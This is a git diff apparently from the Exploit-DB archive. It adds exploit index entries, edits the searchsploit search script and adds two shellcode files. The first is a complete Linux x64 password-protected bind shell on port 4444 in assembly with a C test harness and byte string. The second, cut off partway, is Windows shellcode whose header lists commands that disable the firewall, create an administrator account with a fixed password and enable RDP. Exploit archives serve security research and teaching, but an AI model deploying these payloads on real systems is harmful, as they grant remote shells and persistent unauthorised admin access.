+48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
+48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
+48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
+48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows,
+48344,exploits/windows/local/48344.py,"Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE",2020-04-17,T3jv1l,local,windows,
+48346,exploits/windows/local/48346.py,"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)",2020-04-20,boku,local,windows,
+48350,exploits/windows/local/48350.py,"Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))",2020-04-20,Cervoise,local,windows,
+48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,
+48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows,
+48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
+48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
+48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18074,7 +18102,17 @@ id,file,description,date,author,type,platform,port
48273,exploits/multiple/remote/48273.rb,"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)",2020-03-31,Metasploit,remote,multiple,
48274,exploits/hardware/remote/48274.rb,"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)",2020-03-31,Metasploit,remote,hardware,
48275,exploits/windows/remote/48275.rb,"SharePoint Workflows - XOML Injection (Metasploit)",2020-03-31,Metasploit,remote,windows,
-6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
+48331,exploits/linux_mips/remote/48331.rb,"TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,linux_mips,20002
+48332,exploits/java/remote/48332.msf,"Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)",2020-04-16,Metasploit,remote,java,
+48333,exploits/linux/remote/48333.rb,"ThinkPHP - Multiple PHP Injection RCEs (Metasploit)",2020-04-16,Metasploit,remote,linux,
+48334,exploits/linux/remote/48334.rb,"Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,linux,
+48335,exploits/php/remote/48335.rb,"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)",2020-04-16,Metasploit,remote,php,
+48336,exploits/windows/remote/48336.rb,"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,windows,
+48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple,
+48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
+48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
+48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
+6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
53,exploits/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution",2003-07-10,knight420,webapps,cgi,
@@ -42359,6 +42397,7 @@ id,file,description,date,author,type,platform,port
47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware,
47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java,
47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php,
+48368,exploits/php/webapps/48368.txt,"User Management System 2.0 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php,
47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php,
47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,
47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple,
@@ -42526,3 +42565,53 @@ id,file,description,date,author,type,platform,port
48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php,
+48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php,
+48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple,
+48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple,
+48296,exploits/php/webapps/48296.py,"Bolt CMS 3.7.0 - Authenticated Remote Code Execution",2020-04-06,r3m0t3nu11,webapps,php,
+48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php,
+48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,
+48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
+48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware,
+48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,
+48310,exploits/hardware/webapps/48310.txt,"Huawei HG630 2 Router - Authentication Bypass",2020-04-13,"Eslam Medhat",webapps,hardware,
+48311,exploits/hardware/webapps/48311.py,"TVT NVMS 1000 - Directory Traversal",2020-04-13,"Mohin Paramasivam",webapps,hardware,
+48312,exploits/php/webapps/48312.txt,"Webtateas 2.0 - Arbitrary File Read",2020-04-13,"China Banking and Insurance Information Technology Management Co.",webapps,php,
+48313,exploits/java/webapps/48313.txt,"WSO2 3.1.0 - Arbitrary File Delete",2020-04-13,"Raki Ben Hamouda",webapps,java,
+48315,exploits/php/webapps/48315.txt,"Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion",2020-04-13,"Daniel Monzón",webapps,php,
+48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Noam Moshe",webapps,php,
+48318,exploits/hardware/webapps/48318.txt,"Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution",2020-04-14,Wadeek,webapps,hardware,
+48319,exploits/java/webapps/48319.txt,"WSO2 3.1.0 - Persistent Cross-Site Scripting",2020-04-14,"Raki Ben Hamouda",webapps,java,
+48320,exploits/java/webapps/48320.py,"Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution",2020-04-14,nu11secur1ty,webapps,java,
+48321,exploits/ios/webapps/48321.txt,"AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,ios,
+48322,exploits/ios/webapps/48322.txt,"SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,ios,
+48323,exploits/php/webapps/48323.txt,"Pinger 1.0 - Remote Code Execution",2020-04-15,"Milad karimi",webapps,php,
+48324,exploits/php/webapps/48324.txt,"SeedDMS 5.1.18 - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,php,
+48325,exploits/php/webapps/48325.txt,"Macs Framework 1.14f CMS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,php,
+48326,exploits/php/webapps/48326.txt,"DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting",2020-04-15,"Vulnerability Research Laboratory",webapps,php,
+48327,exploits/ios/webapps/48327.txt,"File Transfer iFamily 2.1 - Directory Traversal",2020-04-15,Vulnerability-Lab,webapps,ios,
+48328,exploits/php/webapps/48328.txt,"Xeroneit Library Management System 3.0 - 'category' SQL Injection",2020-04-15,"Sohel Yousef",webapps,php,
+48340,exploits/ios/webapps/48340.txt,"Playable 9.18 iOS - Persistent Cross-Site Scripting",2020-04-17,Vulnerability-Lab,webapps,ios,
+48341,exploits/php/webapps/48341.txt,"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection",2020-04-17,Vulnerability-Lab,webapps,php,
+48342,exploits/hardware/webapps/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",webapps,hardware,
+48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php,
+48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php,
+48354,exploits/php/webapps/48354.txt,"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting",2020-04-21,"Metin Yunus Kandemir",webapps,php,
+48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php,
+48357,exploits/php/webapps/48357.txt,"CSZ CMS 1.2.7 - 'title' HTML Injection",2020-04-21,"Metin Yunus Kandemir",webapps,php,
+48358,exploits/hardware/webapps/48358.py,"IQrouter 3.3.1 Firmware - Remote Code Execution",2020-04-21,drakylar,webapps,hardware,
+48360,exploits/json/webapps/48360.txt,"NSClient++ 0.5.2.35 - Authenticated Remote Code Execution",2020-04-21,kindredsec,webapps,json,
+48361,exploits/php/webapps/48361.txt,"jizhi CMS 1.6.7 - Arbitrary File Download",2020-04-21,jizhicms,webapps,php,
+48362,exploits/hardware/webapps/48362.txt,"P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)",2020-04-21,LiquidWorm,webapps,hardware,
+48365,exploits/hardware/webapps/48365.txt,"Edimax EW-7438RPn - Information Disclosure (WiFi Password)",2020-04-22,Besim,webapps,hardware,
+48366,exploits/hardware/webapps/48366.txt,"Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)",2020-04-22,Besim,webapps,hardware,
+48367,exploits/linux/webapps/48367.txt,"Mahara 19.10.2 CMS - Persistent Cross-Site Scripting",2020-04-22,Vulnerability-Lab,webapps,linux,
+48369,exploits/php/webapps/48369.txt,"User Management System 2.0 - Authentication Bypass",2020-04-23,Besim,webapps,php,
+48370,exploits/php/webapps/48370.txt,"Complaint Management System 4.2 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php,
+48371,exploits/php/webapps/48371.txt,"Complaint Management System 4.2 - Authentication Bypass",2020-04-23,Besim,webapps,php,
+48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php,
+48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi,
+48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios,
+48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,
+48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware,
+48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 37f30a06b..e6ca9e5cc 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1019,3 +1019,5 @@ id,file,description,date,author,type,platform
48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
+48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows
+48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
diff --git a/searchsploit b/searchsploit
index 71229a762..f762d4fd8 100755
--- a/searchsploit
+++ b/searchsploit
@@ -144,24 +144,24 @@ function update() {
path="${tmp_path[${i}]}"
package="${tmp_package[${i}]}"
- # Update from the repos (e.g. Kali)
- dpkg -l "${package}" 2>/dev/null >/dev/null
+ ## Update from the repos (e.g. Kali)
+ apt-cache search "${package}" 2>/dev/null >/dev/null #dpkg -l "${package}" 2>/dev/null >/dev/null
if [[ "$?" == "0" ]]; then
updatedeb "${package}"
else
- # Update from homebrew (e.g. OSX)
+ ## Update from homebrew (e.g. OSX)
brew 2>/dev/null >/dev/null
if [[ "$?" == "0" ]]; then
- # This only really only updates "./searchsploit". The rest (can) come via git as its updated more frequently
+ ## This only really only updates "./searchsploit". The rest (can) come via git as its updated more frequently
updatedbrew "${package}"
fi
- # Update via Git
+ ## Update via Git
updategit "${package}" "${path}" "${git}"
fi
done
- # Done
+ ## Done
exit 6
}
@@ -185,7 +185,7 @@ function updatedeb() {
function updatedbrew() {
package_in="${1}"
- echo -e "[i] Updating via brew package management.\n"
+ echo -e "[i] Updating via brew package management\n"
brew update \
|| echo -e "\n[-] Issue with brew update (Please check network connectivity)" 1>&2
@@ -315,7 +315,7 @@ function searchsploitout() {
tmp=""
for word in $( echo ${software} ); do
## Add current search term on
- tmp="${tmp}${word} "
+ tmp="${tmp}${word}"
## Check to see if its any phrases which would give a TON of incorrect results
validterm "${tmp}" \
@@ -328,14 +328,18 @@ function searchsploitout() {
## Are there too many results?
lines=$( echo -e "${out}" | wc -l )
if [[ "${lines}" -gt 100 ]]; then
- echo -e "[-] Skipping output: ${tmp} (Too many results. Please re-search manually: $0 ${arg} ${tmp})\n" 1>&2
+ echo -e "[-] Skipping output: ${tmp} (Too many results, 100+. You'll need to force a search: $0 ${arg} ${tmp})\n" 1>&2
## Are there any results?
elif [[ "${lines}" -gt 5 ]]; then
echo -e "${out}\n\n"
## If there's no results
else
+ ## Exit for loop
break
fi
+
+ ## Space out for the next word
+ tmp="${tmp} "
done
## Padding between loops
@@ -352,7 +356,7 @@ function searchsploitout() {
## Are there too many results?
lines=$( echo -e "${out}" | wc -l )
if [[ "${lines}" -gt 100 ]]; then
- echo -e "[-] Skipping output: ${software} (Too many results. Please re-search manually: $0 ${arg} ${software})\n" 1>&2
+ echo -e "[-] Skipping output: ${software} (Too many results, 100+. You'll need to force a search: $0 ${arg} ${software})\n" 1>&2
## Are there any results?
elif [[ "${lines}" -gt 5 ]]; then
echo -e "${out}\n\n"
@@ -390,6 +394,7 @@ function nmapxml() {
;;
"[PRODUCT]")
## We have a name, but no version (yet?) e.g. dnsmasq
+ echo "${software}"
software="${input}"
echo "${software}"
;;
@@ -412,7 +417,8 @@ function buildterms() {
## If we are to use colour ("--colour"), add the values to search for between "or"
if [[ "${COLOUR}" -eq 1 ]]; then
- [[ "${COLOUR_TAG}" ]] && COLOUR_TAG="${COLOUR_TAG}|"
+ [[ "${COLOUR_TAG}" ]] \
+ && COLOUR_TAG="${COLOUR_TAG}|"
COLOUR_TAG="${COLOUR_TAG}${tag_in}"
fi
@@ -490,7 +496,7 @@ function findresults() {
## EXACT search command ("-e")
if [[ "${EXACT}" -eq 1 ]]; then
- buildterms "${TAGS}"
+ buildterms "${TAGS}"
## or AND search command?
else
## For each term
@@ -645,6 +651,7 @@ function findresults() {
OUTPUT="$( echo "${OUTPUT}" \
| awk -F ',' '{ printf "%-'${FORMAT_COL1}'s | %.'${FORMAT_COL2}'s\n", $3, $2 }' \
| sort -f )"
+ #| sed 's_,exploits/_,_; s_,shellcodes/_,_; s_,papers/_,_' \
fi
@@ -711,8 +718,8 @@ elif [[ -f "/etc/searchsploit_rc" ]]; then
elif [[ -f "$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/.searchsploit_rc" ]]; then
rc_file="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/.searchsploit_rc"
## Method #2 - Symbolic link
-elif [[ -f "$( dirname "$( readlink "$0")" )/.searchsploit_rc" ]]; then
- rc_file="$( dirname "$( readlink "$0")" )/.searchsploit_rc"
+elif [[ -f "$( dirname "$( readlink "$0" )" )/.searchsploit_rc" ]]; then
+ rc_file="$( dirname "$( readlink "$0" )" )/.searchsploit_rc"
## Manually specified?
elif [[ ! -f "${rc_file}" ]]; then
echo "[!] Could not find: rc_file ~ ${rc_file}"
@@ -915,7 +922,7 @@ if [[ "${GETPATH}" -eq 1 ]]; then
title=$( grep -m 1 "${path}" "${files}" | cut -d ',' -f 3 | sed 's/"//g' )
## File type
- fileinfo="$(file -b "${location}")"
+ fileinfo="$( file -b "${location}" )"
## How long is the name?
PADDING=$(( 9 - ${#name} ))
diff --git a/shellcodes/linux/48379.c b/shellcodes/linux/48379.c
new file mode 100644
index 000000000..72e38e10d
--- /dev/null
+++ b/shellcodes/linux/48379.c
@@ -0,0 +1,194 @@
+## Exploit Title: Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)
+## Exploit Author: Bobby Cooke
+## Date: 2020-04-23
+## Tested on: Linux x86_64 SMP Debian 5.3.15-1kali1
+## SLAE/Student ID: PA-10913
+## Course: This shellcode was created for the x86_64 Assembly Language and Shellcoding on Linux (SLAE64) Course offered at pentesteracademy.com.
+## Description: Dynamic, Null-free shellcode that spawns a bindshell on TCP port 4444; on all the network interfaces of the host. The bindshell is password protected. The password 'P3WP3Wl4ZerZ' must be entered before execve will spawn a bash shell for the connecting client.
+## Example:
+# user$ nc 127.0.0.1 4444
+# M@G1C WOrDz IZ??asd
+# REALLY?!M@G1C WOrDz IZ??P3WP3Wl4ZerZ
+# id
+# uid=0(root) gid=0(root) groups=0(root)
+
+; int ipv4Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
+; rax = 0x29 ; rdi = 0x2 = AF_INET
+; rsi = 0x1 = SOCK_STREAM ; rdx = 0x0 = IPPROTO_IP
+xor rsi, rsi ; clear rsi
+mul rsi ; clear rax, rdx ; rdx = 0x0 = IPPROTO_IP
+add al, 0x29 ; rax = 0x29 = socket syscall
+inc rsi ; rsi = 0x1 = SOCK_STREAM
+push rsi
+pop rdi ; rdi = 0x1
+inc rdi ; rdi = 0x2 = AF_INET
+syscall ; socket syscall ; RAX returns socket File-Descriptor
+
+; bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
+; rax = 0x31 ; rdi = 0x3 = ipv4Socket
+; rsi = &ipSocketAddr ; rdi = 0x10
+; 02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00
+; Address-Family| PORT| IP Address| 8 bytes of zeros
+xchg rdi, rax ; RDI = sockfd / ipv4Socket
+xor rax, rax
+add al, 0x31 ; rax = 0x31 = socket syscall
+push rdx ; 8 bytes of zeros for second half of struct
+push dx ; 4 bytes of zeros for IPADDR_ANY
+push dx ; 4 bytes of zeros for IPADDR_ANY
+push word 0x5c11 ; push 2 bytes for TCP Port 4444
+inc rdx
+inc rdx ; rdx = 0x2 ; dx = 0x0002
+push dx ; 0x2 = AF_INET
+add dl, 0xe ; rdi = 0x10 = sizeof(ipSocketAddr)
+mov rsi, rsp ; rsi = &ipSocketAddr
+syscall
+
+; int listen(int sockfd, int backlog);
+; rax = 0x32 = listen syscall
+; rdi = sockfd = 0x3 = ipv4Socket ; rsi = backlog = 0
+xor rax, rax
+add al, 0x32 ; listen syscall
+xor rsi, rsi ; backlog = 0x0
+syscall
+
+;accept
+; rax = 0x2b ; rdi = sockfd = 0x3 = ipv4Socket
+; rsi = 0x0 ; rdx = 0x0
+xor rax, rax
+push rax
+push rax
+pop rdx
+pop rsi
+add al, 0x2b ; accept syscall
+syscall ; accept returns client socket file-descriptor in RAX
+
+; dup2
+xchg rdi, rax ; RDI = sockfd / ClientSocketFD
+xor rsi, rsi
+add dl, 0x3 ; Loop Counter
+dup2Loop:
+xor rax, rax
+add al, 0x21 ; RAX = 0x21 = dup2 systemcall
+syscall ; call dup2 x3 to redirect STDIN STDOUT STDERR
+inc rsi
+cmp rsi, rdx ; if 2-STDERR, end loop
+jne dup2Loop
+
+jmp short password
+
+failer:
+; write
+; rax = 0x1 ; rdi = fd = 0x1 STDOUT
+; rsi = &String ; rdx = sizeof(String)
+; String = "REALLY?!"
+; !?YLLAER : 213f594c4c414552
+xor rdi, rdi
+mul rdi
+push rdi
+pop rsi
+push rsi
+mov rsi, 0x213f594c4c414552
+push rsi
+mov rsi, rsp ; rsi = &String
+inc rax ; rax = 0x1 = write system call
+mov rdi, rax
+add rdx, 16 ; 16 bytes / size of string
+syscall
+
+password:
+; write
+; rax = 0x1 ; rdi = fd = 0x1 STDOUT
+; rsi = &String ; rdx = sizeof(String)
+; String = "M@G1C WOrDz IZ??"
+; ??ZI zDr : 3f3f5a49207a4472
+; OW C1G@M : 4f5720433147404d
+xor rdi, rdi
+mul rdi
+push rdi
+pop rsi
+push rsi
+mov rsi, 0x3f3f5a49207a4472 ; ??ZI zDr
+push rsi
+mov rsi, 0x4f5720433147404d ; OW C1G@M
+push rsi
+mov rsi, rsp ; rsi = &String
+inc rax ; rax = 0x1 = write system call
+mov rdi, rax
+add rdx, 16 ; 16 bytes / size of string
+syscall
+
+; read
+; rax = 0x0 = read syscall ; rdi = fd = 0x0 STDIN
+; rsi = Write to &String ; rdx = 0x12 = sizeof(String)
+xor rdi, rdi
+push rdi
+mul rdi ; rdx =0x0 ; rax = 0x0 = write system call
+mov rsi, rsp ; rsi = [RSP] = &String
+add rdx, 12 ; 12 bytes / size of password
+syscall
+
+; String = P3WP3Wl4ZerZ
+; ZreZ : 5a72655a
+; 4lW3PW3P : 346c573350573350
+mov rdi, rsp
+xor rsi, rsi
+add rsi, 0x5a72655a
+push rsi
+mov rsi, 0x346c573350573350
+push rsi
+mov rsi, rsp ; rsi = &String
+xor rcx, rcx
+add rcx, 0xB
+repe cmpsb
+jnz failer
+
+;execve
+; rax = 0x3b ; rdi = Pointer -> "/bin/bash"0x00
+; rsi = 0x0 ; rdx = 0x0
+; "/bin/bash"
+; h : 68
+; sab/nib/ : 7361622f6e69622f
+xor rsi, rsi
+mul rsi ; rdx&rax= 0x0
+xor rdi, rdi
+push rdi
+add rdx, 0x68 ; "h"
+push rdx
+mov rdx, 0x7361622f6e69622f ; "/bin/bas"
+push rdx
+xor rdx, rdx
+mov rdi, rsp
+mov al, 0x3b ; execve syscall
+syscall ; call execve("/bin/bash", NULL, NULL)
+
+################################################################################
+
+// Filename: shellcode.c
+// Compile: gcc -m64 -z execstack -fno-stack-protector shellcode.c -o shellcode
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+"\x48\x31\xf6\x48\xf7\xe6\x04\x29\x48\xff\xc6\x56\x5f\x48\xff\xc7"
+"\x0f\x05\x48\x97\x48\x31\xc0\x04\x31\x52\x66\x52\x66\x52\x66\x68"
+"\x11\x5c\x48\xff\xc2\x48\xff\xc2\x66\x52\x80\xc2\x0e\x48\x89\xe6"
+"\x0f\x05\x48\x31\xc0\x04\x32\x48\x31\xf6\x0f\x05\x48\x31\xc0\x50"
+"\x50\x5a\x5e\x04\x2b\x0f\x05\x48\x97\x48\x31\xf6\x80\xc2\x03\x48"
+"\x31\xc0\x04\x21\x0f\x05\x48\xff\xc6\x48\x39\xd6\x75\xf1\xeb\x23"
+"\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x52\x45\x41\x4c\x4c"
+"\x59\x3f\x21\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2"
+"\x10\x0f\x05\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x72\x44"
+"\x7a\x20\x49\x5a\x3f\x3f\x56\x48\xbe\x4d\x40\x47\x31\x43\x20\x57"
+"\x4f\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2\x10\x0f"
+"\x05\x48\x31\xff\x57\x48\xf7\xe7\x48\x89\xe6\x48\x83\xc2\x0c\x0f"
+"\x05\x48\x89\xe7\x48\x31\xf6\x48\x81\xc6\x5a\x65\x72\x5a\x56\x48"
+"\xbe\x50\x33\x57\x50\x33\x57\x6c\x34\x56\x48\x89\xe6\x48\x31\xc9"
+"\x48\x83\xc1\x0b\xf3\xa6\x0f\x85\x74\xff\xff\xff\x48\x31\xf6\x48"
+"\xf7\xe6\x48\x31\xff\x57\x48\x83\xc2\x68\x52\x48\xba\x2f\x62\x69"
+"\x6e\x2f\x62\x61\x73\x52\x48\x31\xd2\x48\x89\xe7\xb0\x3b\x0f\x05";
+int main()
+{
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/windows/48355.c b/shellcodes/windows/48355.c
new file mode 100644
index 000000000..c18b5ac02
--- /dev/null
+++ b/shellcodes/windows/48355.c
@@ -0,0 +1,285 @@
+## Exploit Title: Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
+## Exploit Author: Bobby Cooke
+## Date: 2020-04-20
+## Tested on: Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86)
+## Description: Windows Shellcode that disables the Windows firewall, adds the user 'MajinBuu' with password 'TurnU2C@ndy!!' to the system, adds the user 'MajinBuu' to the local groups 'Administrators' & 'Remote Desktop Users', and then enables the RDP Service.
+## Commands used:
+## 'netsh firewall set opmode mode=DISABLE'
+## 'net user MajinBuu TurnU2C@ndy!! /add'
+## 'net localgroup Administrators MajinBuu /add'
+## 'net localgroup "Remote Desktop Users" MajinBuu /add'
+## 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
+
+; Create stack frame
+mov ebp, esp
+sub esp, 0x30
+
+; Find kernel32.dll base address
+ xor ebx, ebx
+ mov ebx, [fs:ebx+0x30] ; EBX = Address_of_PEB
+ mov ebx, [ebx+0xC] ; EBX = Address_of_LDR
+ mov ebx, [ebx+0x1C] ; EBX = 1st entry in InitOrderModuleList / ntdll.dll
+ mov ebx, [ebx] ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll
+ mov ebx, [ebx] ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll
+ mov eax, [ebx+0x8] ; EAX = &kernel32.dll / Address of kernel32.dll
+ mov [ebp-0x4], eax ; [EBP-0x04] = &kernel32.dll
+
+; Find the address of the Export Table within kernel32.dll
+ mov ebx, [eax+0x3C] ; EBX = Offset NewEXEHeader
+ add ebx, eax ; EBX = &NewEXEHeader
+ mov ebx, [ebx+0x78] ; EBX = RVA ExportTable
